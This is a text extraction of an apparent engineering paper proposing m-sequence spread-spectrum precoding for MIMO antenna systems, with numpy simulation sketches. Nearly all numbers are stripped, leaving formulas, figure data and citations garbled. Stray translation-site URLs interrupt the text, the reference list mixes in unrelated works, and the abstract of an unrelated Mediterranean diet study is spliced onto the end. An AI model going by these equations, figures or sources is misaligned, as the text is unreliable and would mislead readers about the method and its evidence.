however, each channel has its own channel parameters, so in the process of signal transmission, the influence of channel parameters should be considered. when the signal is received, it needs to be restored, which leads to the complexity of the receiving signal. therefore, this paper proposes a multi antenna precoding algorithm based on m spread spectrum, precoding before sending signal spread spectrum to simplify the signal receiving equipment, and verify the feasibility of the algorithm through system error rate. keywords-mimo; multi antenna technology; mobile communication; spread spectrum; precoding i. introduction with the rapid popularization of the practical application of wireless communication system, the number of wireless communication users and user service demand have increased exponentially, but the radio spectrum resources which can be used in wireless communication services are extremely limited. the contradiction between the increasing demand of wireless service and the limited radio spectrum resources is becoming more and more prominent. mimo multi antenna technology is a new type of wireless communication technology developed under this background. multi antenna [ ] can effectively improve the channel capacity and is widely used. multi antenna technology can make full use of space resources to achieve multiple and multi harvest. without increasing the spectrum resources and transmitting power of the antenna, it can increase the capacity of the system channel, and has obvious advantages in many technologies. it is regarded as the core technology of the next generation mobile communication. however, the influence of channel parameters on receiver terminals can not be ignored in signal transmission. therefore, a precoding algorithm based on m spread spectrum is proposed, which is pre processed before sending signals. in order to achieve the purpose of simplifying the receiving device. ii. multi antenna mimo system a. multi antenna mimo system model mimo multi antenna technology is a major breakthrough in antenna technology in the field of wireless mobile communication. in theory, it can improve the system capacity and frequency efficiency without increasing the time and frequency. its concept is very simple. it needs a transmitter and a receiver that have multiple antennas to carry out signal transmission simultaneously, so that a wireless mimo system can be formed. figure is a schematic block diagram of the mimo system: figure . mimo system schematic diagram the transmitter mapped the data signal sent by the space- time map to multiple antennas and sent them out. the receiver sent the signals received by all the antennas to the space-time decoding to restore the data signals sent by the transmitting terminal. according to the difference of space- time mapping, mimo technology can be roughly divided into two categories: spatial diversity and spatial multiplexing. spatial diversity refers to the use of multiple transmission antennas to send signals with the same information through different paths, and at the same time, multiple independent fading signals of the same data symbol are obtained at the receiver end, thus obtaining the reliability of the diversity mailto: @qq.com international journal of advanced network, monitoring and controls volume , no. , enhancement. for example, in the slow rayleigh fading channel, using a transmitting antenna, the n root receiving antenna sends signals through n different paths. 
if the fading between antennas is independent, the maximum diversity gain can be n. for transmitter diversity technology, the gain of multiple paths is also used to improve the reliability of the system. in a system with n receiving antennas and m transmitting antennas, a maximum diversity gain of m*n can be obtained if the path gains between the antenna pairs are independent, identically distributed rayleigh fading. at present, the commonly used spatial diversity techniques in mimo systems are space time block code (stbc) and beamforming technology. stbc is an important coding form based on transmit diversity, the most basic of which is the alamouti design for two antennas. the signal model of the mimo multi antenna system is

$$\begin{bmatrix} r_1 \\ r_2 \\ \vdots \\ r_{n_r} \end{bmatrix} = \begin{bmatrix} h_{11} & h_{12} & \cdots & h_{1 n_t} \\ h_{21} & h_{22} & \cdots & h_{2 n_t} \\ \vdots & \vdots & & \vdots \\ h_{n_r 1} & h_{n_r 2} & \cdots & h_{n_r n_t} \end{bmatrix} \begin{bmatrix} x_1 \\ x_2 \\ \vdots \\ x_{n_t} \end{bmatrix} + \begin{bmatrix} n_1 \\ n_2 \\ \vdots \\ n_{n_r} \end{bmatrix}$$

that is, in matrix form, $r = hx + n$, where r is the received signal, h is the channel matrix, x is the transmit signal, and n is the noise signal. spatial multiplexing technology uses multiple antennas to transmit independent data at the same time, thus increasing the data capacity of the system. the diversity technique is mainly used to combat channel fading. conversely, the fading characteristics of mimo channels can provide additional channels to increase the degree of freedom in communication. in essence, if the fading between each transmit and receive antenna pair is independent, multiple parallel subchannels can be generated. if different information streams are transmitted on these parallel subchannels, the transmission data rate increases; this is called spatial multiplexing. according to the correspondence between sub data streams and antennas, the spatial multiplexing system can be roughly divided into three modes: d-blast, v-blast and t-blast. b. main technology there are three main technologies in mimo systems: spatial multiplexing, transmission diversity and beamforming. ) space reuse: the system divides the data into multiple parts, which are transmitted on multiple antennas at the transmitter.
after receiving the mixed signals of multiple data, the parallel data streams are distinguished by the independent fading characteristics between different space channels. it achieves the purpose of obtaining higher data rate in the same frequency resource. ) transmission diversity technology: taking the space time coding as the representative, the data stream is jointly encoded at the transmitter side to reduce the symbol error rate due to channel fading and noise. space time coding increases the redundancy of the signal at the transmitter, so that the diversity gain is obtained at the receiver. at present, the commonly used spatial diversity techniques in mimo systems are space time block code (stbc) and beamforming technology. stbc is an important coding form based on transmit diversity, the most basic of which is the alamouti design for two antennas. ) beamforming: the system generates a directivity beam through multiple antennas, concentrating the signal energy in the direction of the desired transmission, thus improving the quality of the signal and reducing the interference to other users. space reuse can maximize the average transmission rate of mimo system, but only a limited diversity gain can be obtained. it may not be used in high order modulation, such as qam, in the use of snr. wireless signals will be reflected frequently in dense urban areas, indoor coverage and other environments, making the fading characteristics of multiple spatial channels more independent, thus making the effect of space multiplexing more obvious. wireless signals are less in the suburbs and in rural areas, and the correlation between different spatial channels is larger, so space reuse is therefore reused. which effect is much worse. the extra diversity gain and coding gain can be obtained by space-time coding of the transmitted signal, so the high order modulation can be used in the wireless environment with relatively small snr, but the rate bonus of the space parallel channel can not be obtained. space coding technology also performs well in situations where wireless correlation is large. beamforming technology can achieve better signal gain and interference suppression when it can acquire channel state information, so it is more suitable for tdd system. beamforming is not suitable for dense urban areas, indoor coverage and other environments. due to reflection, on the one hand, the receiver receives signals from too many http://fanyi.baidu.com/translate?aldtype= &query=w%e % %a %e % c% f&keyfrom=baidu&smartresult=dict&lang=auto zh#zh/en/javascript:void( ); international journal of advanced network, monitoring and controls volume , no. , paths, which results in a poor phase effect. on the other hand, a large number of multipath signals will lead to the difficulty of doa information estimation. c. the advantages of mimo system model the application of mimo technology makes space a kind of resource that can be used to improve performance, and can increase the coverage of wireless system. ) improving the capacity of the channel the mimo access point can transmit and receive multiple spatial flows between the mimo access point and the client side. the channel capacity can increase linearly with the increase of the number of antennas. therefore, the capacity of the wireless channel can be doubled by using the mimo channel. without increasing the bandwidth and the transmit power of the antenna, the spectrum utilization rate can be doubled. 
) improving the reliability of the channel by using the spatial multiplexing gain and spatial diversity gain provided by mimo channel, multiple antennas can be used to suppress channel fading. the application of multi antenna system enables parallel data stream to be transmitted at the same time, which can significantly overcome the channel fading and reduce the bit error rate. d. application ) wireless broadband mobile communication the wireless broadband mobile communication system with mimo technology can be divided into two categories from the multi antenna placement method of the base station. one is that multiple base station antennas are arranged to form an antenna array and are placed in the coverage area. this class can be called a centralized mimo, and the other is that the multiple antennas of the base station are scattered in the coverage area. it is called a distributed mimo. )traditional cellular mobile communication system mimo technology can be applied directly to traditional cellular mobile communication systems, and the single antenna of base stations can be changed into antenna arrays. the base station carries out mimo communication with the mobile station with multiple antennas in the cell through the antenna array. )combining with the traditional distributed antenna system the combination of traditional distributed antenna system and mimo technology can improve the capacity of the system. this new distributed mimo system structure, distributed wireless communication system (dwcs), has become an important research focus of mimo technology. ) the field of wireless communication mimo technology has become one of the key technologies in the field of wireless communication. through the continuous development in recent years, mimo technology will be more and more applied to all kinds of wireless communication systems. )radar field mimo technology is also used in the field of radar. it mainly uses multiple antennas to transmit different orthogonal waveforms, and covers large space at the same time, and uses long time coherent accumulation to obtain high signal to noise ratio. iii. spread spectrum communication a. spread spectrum communication technology the spread spectrum communication technology [ ] is a way of information transmission. the bandwidth of the signal is far greater than the minimum bandwidth required for the information transmitted; the expansion of the frequency band is accomplished by an independent code sequence, implemented by the encoding and modulation methods, and is independent of the information data; the same code is used at the receiver. related synchronous reception, expansion and recovery of transmitted information. the spread spectrum code is used to spread spectrum modulation at the sending end, and the correlation demodulation technology is used to receive the signal at the receiver. spread spectrum communication needs spread spectrum modulation to transmit spread spectrum modulation, and signal reception needs to be extended with the same spread spectrum coding, which provides the basis for frequency multiplexing and multiple access communication. making full use of the correlation characteristics between the spread spectrum codes of different code types, it can be allocated to different users and different spread spectrum codes, which can distinguish different users' signals and do not be disturbed by other users, and the frequency reuse can be realized. 
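the code-division idea described above — different users separated by different spreading codes on the same channel — can be illustrated with a small baseband sketch. numpy is assumed, and the two codes below are short illustrative sequences rather than real m-sequences or gold codes; the point is only that despreading with the right code recovers that user's bits while the other user's signal averages out.

```python
# simplified baseband sketch of code-division user separation: two users share
# the same channel, each with its own spreading code; the receiver recovers one
# user's bits by correlating against that user's code. numpy is assumed; the
# codes here are short illustrative sequences, not real m-sequences.
import numpy as np

code_a = np.array([ 1, -1,  1,  1, -1,  1, -1], dtype=float)   # user a spreading code
code_b = np.array([ 1,  1, -1,  1,  1, -1, -1], dtype=float)   # user b spreading code

bits_a = np.array([1, 0, 1, 1])
bits_b = np.array([0, 0, 1, 0])

def spread(bits, code):
    """map bits to +/-1 symbols and multiply each symbol by the spreading code."""
    symbols = 2.0 * bits - 1.0
    return np.concatenate([s * code for s in symbols])

# both users transmit at the same time over the same channel (plus a little noise)
rng = np.random.default_rng(1)
received = spread(bits_a, code_a) + spread(bits_b, code_b)
received += 0.1 * rng.standard_normal(received.size)

def despread(signal, code):
    """correlate chip blocks with the code and decide each bit from the sign."""
    blocks = signal.reshape(-1, code.size)
    return (blocks @ code > 0).astype(int)

print("user a bits:", despread(received, code_a))   # expected: [1 0 1 1]
print("user b bits:", despread(received, code_b))   # expected: [0 0 1 0]
```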
spread spectrum signal is obtained by spreading the random sequence pseudo-random code to modulate radio frequency signal or to jump the frequency of carrier signal. therefore, the spread spectrum system is different from the traditional communication system, and it can share the same channel resources to the maximum extent. each system has a different extension sequence to reduce interference from other devices. only recipients with the same extension sequence with the transmitter can restructure or compress the spread spectrum signal to obtain effective loading information. even if a set of spread spectrum devices use the same channel to transmit signals in the same area, they will not interfere with each other if they use different spread spectrum sequences. the advantage of the channel reuse of spread spectrum system makes it the most ideal choice in the crowded environment of big cities. b. spread spectrum principle at the transmitter, the input information is first modulated by the information to form a digital signal, and then the spread spectrum code sequence generated by the spread spectrum code generator is used to modulate the digital signal to broaden the spectrum of the signal. the broadened signal is then modulated to radio frequency. at the receiving end, the received wideband radio frequency signal is converted to the intermediate frequency, and then the local spread spectrum code sequence generated from the same origin is despreading, and then the information is international journal of advanced network, monitoring and controls volume , no. , demodulated into the original information output. figure is a schematic map of spread spectrum technology. figure . principle diagram of spread spectrum ) transmitting terminal i) the information input from the transmitter is modulated by information to form a digital signal. ii) spread spectrum code generated by spread spectrum code generator to expand the spectrum of digital signal. iii) the digital signal of rf generator is converted into analog signal and sent through rf signal. ) receiving terminal i) at the receiving end, the received rf signals are converted from high frequency to intermediate frequency that can be processed by electronic devices, and the analog signals are converted into digital signals. ii) the spread spectrum code generator produces the same spread spectrum code as the sending end to despread the digital signal. iii) demodulating the digital signal into the original information output. c. classification of spread spectrum technology in technical implementation, spread spectrum is usually divided into several methods: direct sequence (ds) spread spectrum, frequency hopping (fh) spread spectrum, time hopping (th) spread spectrum and linear frequency modulation (chirp) spread spectrum. ) direct sequence spread spectrum the spread spectrum sequence with high bit rate is used to expand the spectrum of the signal at the transmitter. at the receiver, the same spread spectrum sequence is used to despread, and the spread spread spectrum signal is restored to original information. ) frequency hopping spread spectrum multiple frequency shift keying is selected by using a sequence of codes. that is to say, the frequency shift keying modulation using the spread spectrum code sequence makes the carrier frequency jump. ) time hopping spread spectrum cause the signal to jump on the time axis. first, the time axis is divided into many time pieces, which is controlled by the sequence of spread spectrum code in one frame. 
in other words, the time jump can be understood as the time shift keying of the multi time slice selected by a certain code sequence. ) linear frequency hopping the transmitted radio frequency pulse signal is broadened in one cycle, and the spread spectrum modulation method is mainly applied to radar. d. application of spread spectrum communication as a mature high-tech technology, spread spectrum communication can be applied to: ( ) the dilute rural areas and underdeveloped areas of the remote people; ( ) the prosperous downtown area of the saturated wired infrastructure; ( ) new communities with cable infrastructure lagging due to surging business requirements; ( ) user backbone / backup communication network to make up for the shortage of public network of posts and telecommunications. iv. precoding algorithm based on m spread spectrum a. pseudorandom code theory pseudo random code (pseudo random code, pseudo noise code, pn code, pseudo-noise code) is a code with a similar white noise character, also known as a random (pseudo-noise) sequence. the structure can be pre determined, and can be repeatedly generated and copied, with a random sequence of random characteristics. pseudorandom code sequences can be generated by the shift register network. the network consists of a rp cascade dual state device shift pulse generator and a modular two adder. white noise is a random process, the instantaneous value obeys the normal distribution, and the power spectrum is uniform in a wide band. with excellent correlation characteristics, the autocorrelation function of white noise is similar to the delta function. but it can not realize amplification, modulation, detection, synchronization and control. most pseudo random codes are periodic codes, which can be generated and copied artificially, usually generated by binary shift registers. with the nature of white noise, the correlation function has a sharp characteristic, the power spectrum occupies a very wide band, so it is easy to separate from other signals or interference with excellent anti- interference characteristics. in engineering, pseudo-random codes are commonly used to represent pseudo random codes in two yuan domain , , and elements. ( ) in each cycle, the number of elements and elements is approximately equal, and the maximum is only one difference. ( ) within each cycle, the number of element runs of k bit length appears more than twice as many times as the length of k+ bits (the same element of the same r bit that appears continuously) is called the element distance of the length of the r bit). ( ) the autocorrelation function of a sequence is a periodic function and has a dual value property. international journal of advanced network, monitoring and controls volume , no. , ( ) , , ,.... mn r mk mn n              in the formula, n is the cycle of two yuan sequence, also known as code length or length; k is integer less than n;  is symbol delay. pseudo-random codes have the following characteristics: ( ) the pseudo random signal must have sharp autocorrelation function, and the cross-correlation function value should be close to value. ( ) there is enough code cycle to ensure the requirements of anti detection and anti-jamming. ( ) the number of codes is enough to be used as independent addresses to achieve code division multiple access requirements. ( ) it is easy to be produced in engineering. birth, processing, reproduction and control. 
setting﹛ai﹜ and ﹛bi﹜ is the two code sequence of n,so , n i i n i i a a b b     . cross correlation function:   n ab i i i r a b n        if   abr   , then ai is orthogonal to bi. autocorrelation function:    n a i i i r a a n        ) narrow sense pseudorandom sequence if the length of the code is n, the autocorrelation function of the ﹛ai﹜ sequence is   , , ,... n a i i i mn r a a m n mn n                   ) generalized pseudorandom sequence if the length of the code is n, the autocorrelation function of the ﹛ai﹜sequence is   , , ,... n a i i i mn r a a m mnn                  b. m sequence the m sequence is a pseudo random sequence, pseudo noise (pn) code or pseudo-random code. a sequence that can be determined and can be repeated is called deterministic sequence. a sequence of random sequences that cannot be determined in advance and can not be repeated. sequences that cannot be predefined but can be repeated are called pseudo random sequences. the m sequence is a code sequence whose the cycle is ^ n  generated by a n- linear shift register, which is the abbreviation of the longest linear shift register sequence. for a n level feedback shift register, there can be up to ^n states. for a linear feedback shift register, the full " " state will not be transferred to other states, so the longest period of the sequence of the linear shift register is ^ n  .when the period of the {ai} sequence generated by the n level linear shift register is ^ n  , {ai} is called a n class m sequence. when the feedback function is a nonlinear function, a nonlinear shift register is formed, and its output sequence is nonlinear sequence. the maximum cycle of output sequence can reach ^n, and the nonlinear shift register sequence with the maximum cycle value is called m sequence. generally speaking, in a n level binary shift register generator, the maximum length of code generation cycle is ^ n  . take m= as an example, if its initial state is (a ,a ,a ,a )=( , , , ), then a new input a =  = is generated by a and a mode at the time of shift, and the new state becomes (a ,a ,a ,a ) = ( , , , ) , so that the shift returns to the initial state times, but if the initial state ( , , , ), then, after the shift, the whole state is , which means that the whole state should be avoided in this feedback. there are = different states in the stage. there are kinds of availability except all states, that is, the maximum period of the sequence generated by any level feedback latch is up to , which satisfies the n- . + + + c c cn- an an- a a c = cn= 输出 figure . n class linear feedback latch ai(i= ~n) - the state of the latch. ai= or - feedback state. ci= indicates that the feedback line is disconnected, and ci= means the feedback line is connected. figure shows the composition of a general pure feedback latch. the connection state of the feedback line is expressed in ci, ci= indicates that the line is connected, the ci= is disconnected, and the connection state of the feedback line is different, which may change the period of the latch. international journal of advanced network, monitoring and controls volume , no. , in order to generate m sequences, the characteristic polynomial must be determined to determine the feedback structure of the linear feedback shift register. 
the characteristic equation of the n class linear shift register is defined as: ( ) n n f x c x c x c x      the original polynomial of the m sequence is as follows: ( ) a x x x   ,figure is a shift register structure diagram. figure . shift register structure diagram the initialization register is [d d d d d ]=[ ], the register first shifts left to see m ( ) = , and then according to the above picture, we can see feedback d =c  c . because of the order register, the code length is n= - = . so cycles are needed to get the required m sequence. the simulation results are as follows: . . . . . . . . . figure . m sequence simulation result diagram c. the properties of m sequence ) equilibrium in a period of m sequence, the number of symbols " " and " " are roughly equal, " " appears n- - times, and " " appears n- times (" " more than " "). ) run length distribution run length refers to the same element in the sequence. and the number of this element is called the length of the travel. ) shift additive properties a m sequence mp is added to a different sequence of mr ,generated by any delay shift, modules and is still a mz of a delay shift sequence of mp, that is, mp  mr=mz. now, the m sequence of a m= is now taken as an example, one period of mp is set to , and the other sequence mr is the result that mp moves to the right one time, that is, a corresponding period of mr is , the two sequence modules and the corresponding period of the  = upper form for mz, which is the same as the result of the mp shift to the right times. ) autocorrelation characteristics autocorrelation and cross correlation: a m sequence and its shifted sequence are bit by bit, the sequence obtained is also a m sequence, but the phase is different. the m sequence for different phases in the m sequence generator. when the period p is large and the r module is p , the two sequences are almost orthogonal. , ( ) , , , , j r j j m m          ) periodicity as the m sequence has periodicity, its autocorrelation function is also cyclical, and the period is m, namely ( ) ( )r j r j km  , when , , ,j km k   -m - r(j) /m m i figure . periodic schematic diagram of m sequence the maximum length of the m sequence depends on the progression of the shift register, and the structure of the code depends on the location and quantity of the feedback. different tapped combinations produce code sequences of different lengths and structures, and some tap combinations fail to produce the longest cycle sequences. a great deal of research has been done on what kind of length and sequence of code can be produced by tap. the connection diagram of the level m sequence generator and the structure of the generated m sequence have been obtained. ) power spectral density power spectral density and autocorrelation coefficient constitute a pair of fu liye transform. find out as follows: sin( / ) ( ) ( ) / n m t m n r m t m t m                          international journal of advanced network, monitoring and controls volume , no. , because when m is large, the equilibrium of the m sequence, the range distribution, the autocorrelation and the power spectrum density are all similar to the white noise, but it has the regularity and can be repeated, so the m sequence belongs to a pseudo noise sequence. d. 
application of m sequence and its significance ) application in communication encryption the autocorrelation of m sequence is good, it is easy to produce and copy, and has pseudo randomness. using m sequence to encrypt the digital signal, the encrypted signal has the characteristic of pseudo noise while carrying the original signal, so as to achieve the purpose of hiding information in the process of signal transmission; at the receiver, the m sequence is used again to decrypt and restore the original signal. ) the application of the radar signal design in recent years, the signal used in the spread spectrum radar is a pseudo random sequence with a modulated noise character. it has a high distance resolution and velocity resolution. the receiver of this radar works by means of correlation demodulation. it can work at low snr and has strong anti-interference capability. the radar is a kind of continuous wave radar, which has low probability of interception. it is a kind of new radar, high performance and suitable for modern high-tech war. the radar system using pseudo-random sequences as launching signals has many outstanding advantages. first, it is a continuous wave radar, which can make good use of transmitter power. secondly, in a certain signal to noise ratio, it can achieve a good measurement accuracy and guarantee the single value of the measurement, which has a higher distance resolution and velocity resolution than the monopulse radar. finally, it has strong anti-jamming ability, and the enemy will interfere with this wideband radar signal, which will be much more difficult than interfering with ordinary radar signals. ) application in communication system pseudo random sequence is a seemingly random, actually regular periodic binary sequence, which has the properties similar to noise sequence. in cdma, the address code is selected from pseudo random sequence, and a pseudo random sequence is used most easily in cdma; m sequence is used to distinguish different users from different phases of the m sequence. for data security, a data mask (data disruption) technique is used in the paging channel and forward service channel of the cdma, which is used to scramble the traffic channel with the m sequence of the length of  , which is performed on the modulation characters output by the packet interleaver. through the interleaver output character and the long code pn chip, the binary mode addition is completed. e. precoding algorithm based on m spread spectrum on the basis of the original spread spectrum technology, the algorithm proposed a new technology. the general signal must have the matrix parameters of the channel itself during a certain channel during the transmission and reception. in this way, the reduction of the signal is difficult when receiving the signal at the receiving end. in other words, in real life, the general signal sending and receiving may make the device of the receiver complex. in order to simplify the receiving device, the inverse matrix of the channel is multiplied before the signal is sent, so that the purpose is achieved within a certain range of bit error rate. the design steps are as follows: step ( ): the data flow of the first user is   { } k b ,   { } k b and }{ )( b k . 
the base station transmitter encodes the data of three channels to get coded signals   k s ,   k s and   k s :  gbs gbs gbs kk kk kk )( )( )( )( )( )(     among them, g , g and g are generating matrices. the three spatial channel of user k uses three different encoding. g , g , and g corresponding check matrices are h , h and h ; step ): the coding signals   k s ,   k s and   k s of the k user are modulated by the channel matrix.                                                          )( )( )( k k k kkk kkk kkk k k k hhh hhh hhh s s s z z z  among them,  ( ) , , , , kijh i j  is the attenuation coefficient of the base station transmitter antenna i to the k mobile receiver antenna j through the independent rayleigh path. and the baseband modulation signals of the k users,   k z ,   k z and   k z , kk ,,  are obtained. step ): the base band transmitter modulates the baseband modulation signals   k z ,   k z and   k z , kk ,,  , and obtains the signal   ( ) k t z ,   ( ) k t z and   ( ) k t z based on the m spread spectrum precoding, and then the three antennas are transmitted respectively. step ): the k mobile receiver uses the local despreading circuit to extract the baseband encoded signals   k y ,   k y and   k y . international journal of advanced network, monitoring and controls volume , no. ,                                                                n n n k k k )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( )( z z z hhh hhh hhh y y y rt rt rt k k k t k k k k k k kkk kkk kkk  in formula ,   k n is the baseband noise vector for the first antenna’s channel of the k mobile station receiver,   k n is the baseband noise vector for the second antenna’s channel of the k mobile station receiver,   k n is the baseband noise vector for the third antenna’s channel of the k mobile station receiver , ( ) ( ) k t r  , ( ) ( ) k t r  and ( ) ( ) k t r  are the representations of despreading. step ): the k receiver uses a local decoder to decode the received baseband signals   k y ,   k y and   k y , and extracts the data streams of the base station to transmit data streams ( ) k b , ( ) k b and ( ) k b , with ( ) ( ) k k b h  , ( ) ( ) k k b h  and ( ) ( ) k k b h  without error. v. simulation analysis taking the * antenna system as an example, a binary original signal with a sequence length of is sent as shown in figure . before sending the signal, a binary signal with a spread spectrum growth of is spread out with a precoding algorithm based on m spread spectrum, and the binary signal processed by the algorithm is shown as shown in figure . after the receiver despreading. it is found that the original signal and the received signal have some error. therefore, the different antenna systems using the algorithm, the error rate simulation under the same signal to noise ratio, and under the same antenna system, the algorithm is applied to simulate the error rate of the algorithm without using the algorithm. . . . . . . . . . original sequence figure . original signal . . . . . . . . . receiving sequence figure . the signal received by this algorithm the error rate simulation is carried out with different antenna systems. the results are shown in figure . 
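the kind of simulation just described can be sketched as follows. this is a simplified reconstruction, not the authors' code: numpy is assumed, the antenna count, spreading-code period, number of bits and snr are placeholder values (the exact figures were not recoverable from the text), the channel is assumed perfectly known at the transmitter, and transmit-power normalisation is ignored.

```python
# simplified sketch of the simulation described above: bits are spread with an
# m-sequence, precoded with the inverse of the (assumed known) channel matrix,
# sent over a rayleigh-fading mimo channel and despread at the receiver.
import numpy as np

def m_sequence(length):
    """+/-1 m-sequence of period 7 from s[n] = s[n-2] xor s[n-3]
    (primitive polynomial x^3 + x + 1)."""
    s = [1, 0, 0]
    for n in range(3, length):
        s.append(s[n - 2] ^ s[n - 3])
    return 2 * np.array(s[:length]) - 1

rng = np.random.default_rng(2)
n_tx = n_rx = 3                       # 3x3 antenna system, as in the algorithm steps
code = m_sequence(7)                  # one period of the spreading code
n_bits = 2000                         # bits per antenna (placeholder)
snr_db = 10.0

bits = rng.integers(0, 2, size=(n_tx, n_bits))
symbols = 2.0 * bits - 1.0
# spread: repeat each symbol over one code period and multiply by the code chips
chips = np.repeat(symbols, code.size, axis=1) * np.tile(code, (n_tx, n_bits))

# rayleigh channel and channel-inverse precoding at the transmitter
h = (rng.standard_normal((n_rx, n_tx)) + 1j * rng.standard_normal((n_rx, n_tx))) / np.sqrt(2)
precoded = np.linalg.inv(h) @ chips

noise_std = np.sqrt(0.5 * 10 ** (-snr_db / 10))
noise = noise_std * (rng.standard_normal((n_rx, chips.shape[1]))
                     + 1j * rng.standard_normal((n_rx, chips.shape[1])))
received = h @ precoded + noise       # h cancels the precoder, leaving chips + noise

# despread: correlate each block of chips with the code and decide by the sign
blocks = received.real.reshape(n_rx, n_bits, code.size)
decided = (np.einsum("abc,c->ab", blocks, code) > 0).astype(int)
print(f"bit error rate at {snr_db} db:", np.mean(decided != bits))
```

sweeping snr_db and repeating the run with and without the channel-inverse precoding step would reproduce the style of comparison reported in the error-rate figure.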
the bit error rate increases with the increase of the number of antennas at the same signal to noise ratio, but the bit error rate tends to be stable with the increase of signal to noise ratio. with the increase of the signal to noise ratio, the bit error rate decreases. for the same antenna system, the ber of the antenna system adopting the algorithm is significantly lower than that of the antenna system without the same signal to noise ratio. - . - . - . - . - . - . snr(db) e rr o r ra te * antenna system uses this algorithm * antenna system does not use this algorithm * antenna system uses this algorithm figure . error rate simulation diagram it can be concluded that the algorithm can be used to simplify the receiving device of the receiver to a certain extent. but in practical applications, the interference of various signals in the channel also affects the signal of the receiver, so the algorithm needs to be improved so as to adapt to various channels. vi. conclusion and prospect with the rapid development of science and technology, the demand for wireless service is not only the improvement of information rate, but also the high quality of receiving information. the space reuse and diversity technology of http://fanyi.baidu.com/#zh/en/javascript:void( ); international journal of advanced network, monitoring and controls volume , no. , mimo multi antenna communication system can effectively transmit and receive multiple data streams at the same time and in the same frequency band. reasonable use of spatial multiplexing and diversity technology can not only improve information rate, but also improve system performance. it can greatly improve the spectrum utilization of communication systems and meet the high rate of users' communication needs. therefore, it has received extensive attention and research at home and abroad. it has become one of the most promising technologies in the g mobile communication system. in the actual production and life, sometimes too many complex equipment will affect the results and feasibility of the experiment, so we should also pay attention to the study of the technology, and we should also pay attention to the simplification of the equipment without affecting the experimental results. the purpose of this project is to bring forward a new principle based on the original spread spectrum, according to the theoretical knowledge, so that the equipment can be simplified. in this way, a higher effect will be achieved in the application of the g mimo system. however, due to the interference of all kinds of noise in the signal transmission, it will have a certain influence on the receiving signal. therefore, the algorithm can be improved from the direction of interference coordination to reduce the impact of interference on the received signal. acknowledgements this project is supported by ‘the excellent going abroad experts’ training program in hebei province, doctoral research fund of north china university of science and technology, national science and technology support program (no. bah b ), hebei natural science foundation of china: (no. f ). references [ ] guo wenzhuo. research on key technologies of multi antenna multiuser communication system [d]. harbin: harbin engineering university, . [ ] zhang fenghua, li wangqing. application and development of spread spectrum communication technology [n]. xinjiang science and technology daily (han), . [ ] research on differential space-time coding technology in chen yuyan mimo-ofdm system [d]. 
shanghai: shanghai jiao tong university. . [ ] gan y h, ling c mow w h. complex lattice reduction algorithm for low-complexity full-diversity mimo detection[j]. ieee transactions on signal processing, , ( ): - . [ ] zu k, lamare r c, haardt m. generalized design of low-complexity block diagonalization type precoding algorithms for multiuser mimo systems[j]. ieee transactions on communications, , ( ): - . [ ] dong tao, jiang zhucheng, you xiao hu. optimization of channel estimation for spread spectrum system [j]. circuit and systems, - . [ ] f adachi,m sawahashi,h suda. wideband ds-cdma for next- generation mobile communications systems[j].ieee communicationsmagazine, ,( ): - . [ ] wang huihua, li baoping. m sequence generator [j]. journal of beijing electronics science and technology institute, , : - . [ ] liu zhenming.study on the cross correlation properties of m sequences [d].university of national defense science and technology, . [ ] cheng jianli, huang fuqing, tu jia, xu yitao. the soft spread spectrum technology based on the same spread spectrum code [a]., the youth work committee of the chinese communications society, the new development of the. communication theory and technology of the school of information engineering of north china university of technology - the twelfth national youth communications academic association (book below) [c]. china communications society school of information engineering, north china university of technology, : . [ ] ma yufeng, lv chengmin, song feng, sun jun. a research on the information hiding algorithm based on spread spectrum technology [a]. china communications society. the fifth academic annual conference of the china communications society, [c]. china communications society: : .[ ] ai bo. mimo communication system coding [m]. electronic industry press,. . [ ] chen hong.mimo-ofdm key technology research [d]. tianjin: tianjin university, . [ ] nie chunyan. creative judgment of claims in communication network technology category [n]. china intellectual property office, . [ ] ting ann. effective crm software. legacy systems can be accessed using integration technology.[j]. healthcare informatics, , ( ). [ ] [ ] joseph g. young. program analysis and transformation in mathematical programming[d]. rice university, . [ ] comeron j m, kreitman m. the correlation between synonymous and nonsynonymous substitutions in drosophila: mutation, selection or relaxed constraints[j]. genetics, , ( ). [ ] tao chongqiang, yang quan, yuan xiao. simulation study on spread spectrum communication system of m sequence, gold sequence and orthogonal gold sequence [j]. electronic design engineering, ( ): - . [ ] gu jingmin, liang tao, yu yong. a new mimo transmission power allocation algorithm research [a]. communication theory and new progress in signal processing - communication theory and signal processing annual conference paper, [c], . [ ] xiong yan. research on precoding technology of mimo multi-user broadcast channel [d]. beijing: beijing university of posts and telecommunications. . [ ] antenna selection technology in fang xiaoyong mimo system [d]. xi'an: xi'an electronic and science university,. . 
identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques alba arceo-vilas ,*, carlos fernandez-lozano , ,*, salvador pita ,†, sonia pértega-díaz and alejandro pazos , clinical epidemiology and biostatistics research group, instituto de investigación biomédica de a coruña (inibic), complexo hospitalario universitario de a coruña (chuac), sergas, universidade da coruña, a coruña, spain department of computer science and information technologies, faculty of computer science, citic-research center of information and communication technologies, universidade da coruña, a coruña, spain grupo de redes de neuronas artificiales y sistemas adaptativos. imagen médica y diagnóstico radiológico (rnasa-imedir). instituto de investigación biomédica de a coruña (inibic). complexo hospitalario universitario de a coruña (chuac), sergas, universidade da coruña, a coruña, spain * these authors contributed equally to this work. † deceased author. abstract food consumption patterns have undergone changes that in recent years have resulted in serious health problems. studies based on the evaluation of the nutritional status have determined that the adoption of a food pattern-based primarily on a mediterranean diet (md) has a preventive role, as well as the ability to mitigate the negative effects of certain pathologies. a group of more than adults aged over years from our cohort in northwestern spain was surveyed. under our experimental design, experiments were run with four different machine-learning algorithms and the predictive factors most relevant to the adherence of a md were identified. a feature selection approach was explored and under a null hypothesis test, it was concluded that only measures were of relevance, suggesting the strength of this observational study. our findings indicate that the following factors have the highest predictive value in terms of the degree of adherence to the md: basal metabolic rate, mini nutritional assessment questionnaire total score, weight, height, bone density, waist-hip ratio, smoking habits, age, edi-od, circumference of the arm, activity metabolism, subscapular skinfold, subscapular circumference in cm, circumference of the waist, circumference of the calf and brachial area.
